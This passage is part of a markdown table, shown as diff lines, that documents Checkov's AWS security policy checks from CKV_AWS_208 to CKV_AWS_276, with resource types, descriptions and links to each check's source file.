+|  605 | CKV_AWS_208              | resource                         | aws_mq_configuration                                                                             | Ensure MQ Broker version is current                                                                                                                                                                      | Terraform               | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py)                                                                                                 |
+|  606 | CKV_AWS_209              | resource                         | aws_mq_broker                                                                                    | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK)                                                                                                                                     | Terraform               | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py)                                                                               |
+|  607 | CKV_AWS_210              | resource                         | aws_batch_job_definition                                                                         | Batch job does not define a privileged container                                                                                                                                                         | Terraform               | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py)                                                                                 |
+|  608 | CKV_AWS_211              | resource                         | aws_db_instance                                                                                  | Ensure RDS uses a modern CaCert                                                                                                                                                                          | Terraform               | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py)                                                                                             |
+|  609 | CKV_AWS_212              | resource                         | aws_dms_replication_instance                                                                     | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK)                                                                                                                   | Terraform               | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py)                                                   |
+|  610 | CKV_AWS_213              | resource                         | aws_load_balancer_policy                                                                         | Ensure ELB Policy uses only secure protocols                                                                                                                                                             | Terraform               | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py)                                                                       |
+|  611 | CKV_AWS_214              | resource                         | aws_appsync_api_cache                                                                            | Ensure AppSync API Cache is encrypted at rest                                                                                                                                                            | Terraform               | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py)                                                                 |
+|  612 | CKV_AWS_215              | resource                         | aws_appsync_api_cache                                                                            | Ensure AppSync API Cache is encrypted in transit                                                                                                                                                         | Terraform               | [AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py)                                                           |
+|  613 | CKV_AWS_216              | resource                         | aws_cloudfront_distribution                                                                      | Ensure CloudFront distribution is enabled                                                                                                                                                                | Terraform               | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py)                                                                     |
+|  614 | CKV_AWS_217              | resource                         | aws_api_gateway_deployment                                                                       | Ensure Create before destroy for API deployments                                                                                                                                                         | Terraform               | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py)                                                 |
+|  615 | CKV_AWS_218              | resource                         | aws_cloudsearch_domain                                                                           | Ensure that CloudSearch is using latest TLS                                                                                                                                                              | Terraform               | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py)                                                                                       |
+|  616 | CKV_AWS_219              | resource                         | aws_codepipeline                                                                                 | Ensure CodePipeline Artifact store is using a KMS CMK                                                                                                                                                    | Terraform               | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py)                                                                   |
+|  617 | CKV_AWS_220              | resource                         | aws_cloudsearch_domain                                                                           | Ensure that CloudSearch is using https                                                                                                                                                                   | Terraform               | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py)                                                                     |
+|  618 | CKV_AWS_221              | resource                         | aws_codeartifact_domain                                                                          | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK)                                                                                                                        | Terraform               | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py)                                                           |
+|  619 | CKV_AWS_222              | resource                         | aws_dms_replication_instance                                                                     | Ensure DMS replication instance gets all minor upgrade automatically                                                                                                                                     | Terraform               | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py)                                                           |
+|  620 | CKV_AWS_223              | resource                         | aws_ecs_cluster                                                                                  | Ensure ECS Cluster enables logging of ECS Exec                                                                                                                                                           | Terraform               | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py)                                                                               |
+|  621 | CKV_AWS_224              | resource                         | aws_ecs_cluster                                                                                  | Ensure ECS Cluster logging is enabled and client to container communication uses CMK                                                                                                                     | Terraform               | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py)                                                             |
+|  622 | CKV_AWS_225              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure API Gateway method setting caching is enabled                                                                                                                                                     | Terraform               | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py)                                                       |
+|  623 | CKV_AWS_226              | resource                         | aws_db_instance                                                                                  | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform               | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                                   |
+|  624 | CKV_AWS_226              | resource                         | aws_rds_cluster_instance                                                                         | Ensure DB instance gets all minor upgrades automatically                                                                                                                                                 | Terraform               | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py)                                                                                   |
+|  625 | CKV_AWS_227              | resource                         | aws_kms_key                                                                                      | Ensure KMS key is enabled                                                                                                                                                                                | Terraform               | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py)                                                                                                 |
+|  626 | CKV_AWS_228              | resource                         | aws_elasticsearch_domain                                                                         | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform               | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                                   |
+|  627 | CKV_AWS_228              | resource                         | aws_opensearch_domain                                                                            | Verify Elasticsearch domain is using an up to date TLS policy                                                                                                                                            | Terraform               | [ElasticsearchTLSPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchTLSPolicy.py)                                                                                   |
+|  628 | CKV_AWS_229              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                                 |
+|  629 | CKV_AWS_229              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 21                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress21.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress21.py)                                                                 |
+|  630 | CKV_AWS_230              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                                 |
+|  631 | CKV_AWS_230              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 20                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress20.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress20.py)                                                                 |
+|  632 | CKV_AWS_231              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                             |
+|  633 | CKV_AWS_231              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 3389                                                                                                                                                 | Terraform               | [NetworkACLUnrestrictedIngress3389.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress3389.py)                                                             |
+|  634 | CKV_AWS_232              | resource                         | aws_network_acl                                                                                  | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                                 |
+|  635 | CKV_AWS_232              | resource                         | aws_network_acl_rule                                                                             | Ensure no NACL allow ingress from 0.0.0.0:0 to port 22                                                                                                                                                   | Terraform               | [NetworkACLUnrestrictedIngress22.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/NetworkACLUnrestrictedIngress22.py)                                                                 |
+|  636 | CKV_AWS_233              | resource                         | aws_acm_certificate                                                                              | Ensure Create before destroy for ACM certificates                                                                                                                                                        | Terraform               | [ACMCertCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertCreateBeforeDestroy.py)                                                                           |
+|  637 | CKV_AWS_234              | resource                         | aws_acm_certificate                                                                              | Verify logging preference for ACM certificates                                                                                                                                                           | Terraform               | [ACMCertSetLoggingPreference.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ACMCertSetLoggingPreference.py)                                                                         |
+|  638 | CKV_AWS_235              | resource                         | aws_ami_copy                                                                                     | Ensure that copied AMIs are encrypted                                                                                                                                                                    | Terraform               | [AMICopyIsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyIsEncrypted.py)                                                                                           |
+|  639 | CKV_AWS_236              | resource                         | aws_ami_copy                                                                                     | Ensure AMI copying uses a CMK                                                                                                                                                                            | Terraform               | [AMICopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMICopyUsesCMK.py)                                                                                                   |
+|  640 | CKV_AWS_237              | resource                         | aws_api_gateway_rest_api                                                                         | Ensure Create before destroy for API Gateway                                                                                                                                                             | Terraform               | [APIGatewayCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayCreateBeforeDestroy.py)                                                                     |
+|  641 | CKV_AWS_238              | resource                         | aws_guardduty_detector                                                                           | Ensure that GuardDuty detector is enabled                                                                                                                                                                | Terraform               | [GuarddutyDetectorEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GuarddutyDetectorEnabled.py)                                                                               |
+|  642 | CKV_AWS_239              | resource                         | aws_dax_cluster                                                                                  | Ensure DAX cluster endpoint is using TLS                                                                                                                                                                 | Terraform               | [DAXEndpointTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DAXEndpointTLS.py)                                                                                                   |
+|  643 | CKV_AWS_240              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure Kinesis Firehose delivery stream is encrypted                                                                                                                                                     | Terraform               | [KinesisFirehoseDeliveryStreamSSE.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamSSE.py)                                                               |
+|  644 | CKV_AWS_241              | resource                         | aws_kinesis_firehose_delivery_stream                                                             | Ensure that Kinesis Firehose Delivery Streams are encrypted with CMK                                                                                                                                     | Terraform               | [KinesisFirehoseDeliveryStreamUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisFirehoseDeliveryStreamUsesCMK.py)                                                       |
+|  645 | CKV_AWS_242              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has scheduler logs enabled                                                                                                                                                       | Terraform               | [MWAASchedulerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAASchedulerLogsEnabled.py)                                                                               |
+|  646 | CKV_AWS_243              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has worker logs enabled                                                                                                                                                          | Terraform               | [MWAAWorkerLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWorkerLogsEnabled.py)                                                                                     |
+|  647 | CKV_AWS_244              | resource                         | aws_mwaa_environment                                                                             | Ensure MWAA environment has webserver logs enabled                                                                                                                                                       | Terraform               | [MWAAWebserverLogsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MWAAWebserverLogsEnabled.py)                                                                               |
+|  648 | CKV_AWS_245              | resource                         | aws_db_instance_automated_backups_replication                                                    | Ensure replicated backups are encrypted at rest using KMS CMKs                                                                                                                                           | Terraform               | [RDSInstanceAutoBackupEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSInstanceAutoBackupEncryptionWithCMK.py)                                                   |
+|  649 | CKV_AWS_246              | resource                         | aws_rds_cluster_activity_stream                                                                  | Ensure RDS Cluster activity streams are encrypted using KMS CMKs                                                                                                                                         | Terraform               | [RDSClusterActivityStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterActivityStreamEncryptedWithCMK.py)                                               |
+|  650 | CKV_AWS_247              | resource                         | aws_elasticsearch_domain                                                                         | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform               | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                                   |
+|  651 | CKV_AWS_247              | resource                         | aws_opensearch_domain                                                                            | Ensure all data stored in the Elasticsearch is encrypted with a CMK                                                                                                                                      | Terraform               | [ElasticsearchEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchEncryptionWithCMK.py)                                                                   |
+|  652 | CKV_AWS_248              | resource                         | aws_elasticsearch_domain                                                                         | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform               | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                                   |
+|  653 | CKV_AWS_248              | resource                         | aws_opensearch_domain                                                                            | Ensure that Elasticsearch is not using the default Security Group                                                                                                                                        | Terraform               | [ElasticsearchDefaultSG.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticsearchDefaultSG.py)                                                                                   |
+|  654 | CKV_AWS_249              | resource                         | aws_ecs_task_definition                                                                          | Ensure that the Execution Role ARN and the Task Role ARN are different in ECS Task definitions                                                                                                           | Terraform               | [ECSTaskDefinitionRoleCheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSTaskDefinitionRoleCheck.py)                                                                           |
+|  655 | CKV_AWS_250              | resource                         | aws_db_instance                                                                                  | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform               | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                                       |
+|  656 | CKV_AWS_250              | resource                         | aws_rds_cluster                                                                                  | Ensure that RDS PostgreSQL instances use a non vulnerable version with the log_fdw extension (https://aws.amazon.com/security/security-bulletins/AWS-2022-004/)                                          | Terraform               | [RDSPostgreSQLLogFDWExtension.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSPostgreSQLLogFDWExtension.py)                                                                       |
+|  657 | CKV_AWS_251              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail logging is enabled                                                                                                                                                                     | Terraform               | [CloudtrailEnableLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailEnableLogging.py)                                                                                 |
+|  658 | CKV_AWS_252              | resource                         | aws_cloudtrail                                                                                   | Ensure CloudTrail defines an SNS Topic                                                                                                                                                                   | Terraform               | [CloudtrailDefinesSNSTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudtrailDefinesSNSTopic.py)                                                                             |
+|  659 | CKV_AWS_253              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region events are encrypted                                                                                                                                                             | Terraform               | [DLMEventsCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryption.py)                                                                   |
+|  660 | CKV_AWS_254              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region events are encrypted with Customer Managed Key                                                                                                                                   | Terraform               | [DLMEventsCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMEventsCrossRegionEncryptionWithCMK.py)                                                     |
+|  661 | CKV_AWS_255              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region schedules are encrypted                                                                                                                                                          | Terraform               | [DLMScheduleCrossRegionEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryption.py)                                                               |
+|  662 | CKV_AWS_256              | resource                         | aws_dlm_lifecycle_policy                                                                         | Ensure DLM cross region schedules are encrypted using a Customer Managed Key                                                                                                                             | Terraform               | [DLMScheduleCrossRegionEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DLMScheduleCrossRegionEncryptionWithCMK.py)                                                 |
+|  663 | CKV_AWS_257              | resource                         | aws_codecommit_approval_rule_template                                                            | Ensure CodeCommit branch changes have at least 2 approvals                                                                                                                                               | Terraform               | [CodecommitApprovalsRulesRequireMin2.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodecommitApprovalsRulesRequireMin2.py)                                                         |
+|  664 | CKV_AWS_258              | resource                         | AWS::Lambda::Url                                                                                 | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Cloudformation          | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                                |
+|  665 | CKV_AWS_258              | resource                         | aws_lambda_function_url                                                                          | Ensure that Lambda function URLs AuthType is not None                                                                                                                                                    | Terraform               | [LambdaFunctionURLAuth.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaFunctionURLAuth.py)                                                                                     |
+|  666 | CKV_AWS_259              | resource                         | aws_cloudfront_response_headers_policy                                                           | Ensure CloudFront response header policy enforces Strict Transport Security                                                                                                                              | Terraform               | [CloudFrontResponseHeaderStrictTransportSecurity.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudFrontResponseHeaderStrictTransportSecurity.py)                                 |
+|  667 | CKV_AWS_260              | resource                         | AWS::EC2::SecurityGroup                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                      |
+|  668 | CKV_AWS_260              | resource                         | AWS::EC2::SecurityGroupIngress                                                                   | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Cloudformation          | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                      |
+|  669 | CKV_AWS_260              | resource                         | aws_security_group                                                                               | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  670 | CKV_AWS_260              | resource                         | aws_security_group_rule                                                                          | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  671 | CKV_AWS_260              | resource                         | aws_vpc_security_group_ingress_rule                                                              | Ensure no security groups allow ingress from 0.0.0.0:0 to port 80                                                                                                                                        | Terraform               | [SecurityGroupUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SecurityGroupUnrestrictedIngress80.py)                                                           |
+|  672 | CKV_AWS_261              | resource                         | aws_alb_target_group                                                                             | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                               |
+|  673 | CKV_AWS_261              | resource                         | aws_lb_target_group                                                                              | Ensure HTTP HTTPS Target group defines Healthcheck                                                                                                                                                       | Terraform               | [LBTargetGroupsDefinesHealthcheck.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LBTargetGroupsDefinesHealthcheck.py)                                                               |
+|  674 | CKV_AWS_262              | resource                         | aws_kendra_index                                                                                 | Ensure Kendra index Server side encryption uses CMK                                                                                                                                                      | Terraform               | [KendraIndexSSEUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KendraIndexSSEUsesCMK.py)                                                                                     |
+|  675 | CKV_AWS_263              | resource                         | aws_appflow_flow                                                                                 | Ensure AppFlow flow uses CMK                                                                                                                                                                             | Terraform               | [AppFlowUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowUsesCMK.py)                                                                                                   |
+|  676 | CKV_AWS_264              | resource                         | aws_appflow_connector_profile                                                                    | Ensure AppFlow connector profile uses CMK                                                                                                                                                                | Terraform               | [AppFlowConnectorProfileUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppFlowConnectorProfileUsesCMK.py)                                                                   |
+|  677 | CKV_AWS_265              | resource                         | aws_keyspaces_table                                                                              | Ensure Keyspaces Table uses CMK                                                                                                                                                                          | Terraform               | [KeyspacesTableUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KeyspacesTableUsesCMK.py)                                                                                     |
+|  678 | CKV_AWS_266              | resource                         | aws_db_snapshot_copy                                                                             | Ensure DB Snapshot copy uses CMK                                                                                                                                                                         | Terraform               | [DBSnapshotCopyUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBSnapshotCopyUsesCMK.py)                                                                                     |
+|  679 | CKV_AWS_267              | resource                         | aws_comprehend_entity_recognizer                                                                 | Ensure that Comprehend Entity Recognizer's model is encrypted by KMS using a customer managed Key (CMK)                                                                                                  | Terraform               | [ComprehendEntityRecognizerModelUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerModelUsesCMK.py)                                                   |
+|  680 | CKV_AWS_268              | resource                         | aws_comprehend_entity_recognizer                                                                 | Ensure that Comprehend Entity Recognizer's volume is encrypted by KMS using a customer managed Key (CMK)                                                                                                 | Terraform               | [ComprehendEntityRecognizerVolumeUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ComprehendEntityRecognizerVolumeUsesCMK.py)                                                 |
+|  681 | CKV_AWS_269              | resource                         | aws_connect_instance_storage_config                                                              | Ensure Connect Instance Kinesis Video Stream Storage Config uses CMK                                                                                                                                     | Terraform               | [ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceKinesisVideoStreamStorageConfigUsesCMK.py)                     |
+|  682 | CKV_AWS_270              | resource                         | aws_connect_instance_storage_config                                                              | Ensure Connect Instance S3 Storage Config uses CMK                                                                                                                                                       | Terraform               | [ConnectInstanceS3StorageConfigUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ConnectInstanceS3StorageConfigUsesCMK.py)                                                     |
+|  683 | CKV_AWS_271              | resource                         | aws_dynamodb_table_replica                                                                       | Ensure DynamoDB table replica KMS encryption uses CMK                                                                                                                                                    | Terraform               | [DynamoDBTableReplicaKMSUsesCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBTableReplicaKMSUsesCMK.py)                                                                   |
+|  684 | CKV_AWS_272              | resource                         | aws_lambda_function                                                                              | Ensure AWS Lambda function is configured to validate code-signing                                                                                                                                        | Terraform               | [LambdaCodeSigningConfigured.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaCodeSigningConfigured.py)                                                                         |
+|  685 | CKV_AWS_273              | resource                         | aws_iam_user                                                                                     | Ensure access is controlled through SSO and not AWS IAM defined users                                                                                                                                    | Terraform               | [IAMUserNotUsedForAccess.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMUserNotUsedForAccess.py)                                                                                 |
+|  686 | CKV_AWS_274              | resource                         | aws_iam_group_policy_attachment                                                                  | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  687 | CKV_AWS_274              | resource                         | aws_iam_policy_attachment                                                                        | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  688 | CKV_AWS_274              | resource                         | aws_iam_role                                                                                     | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  689 | CKV_AWS_274              | resource                         | aws_iam_role_policy_attachment                                                                   | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  690 | CKV_AWS_274              | resource                         | aws_iam_user_policy_attachment                                                                   | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  691 | CKV_AWS_274              | resource                         | aws_ssoadmin_managed_policy_attachment                                                           | Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy                                                                                                                      | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/IAMManagedAdminPolicy.py)                                                                                     |
+|  692 | CKV_AWS_275              | data                             | aws_iam_policy                                                                                   | Disallow policies from using the AWS AdministratorAccess policy                                                                                                                                          | Terraform               | [IAMManagedAdminPolicy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/aws/IAMManagedAdminPolicy.py)                                                                                         |
+|  693 | CKV_AWS_276              | resource                         | aws_api_gateway_method_settings                                                                  | Ensure Data Trace is not enabled in API Gateway Method Settings                                                                                                                                          | Terraform               | [APIGatewayMethodSettingsDataTrace.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsDataTrace.py)                                                             |
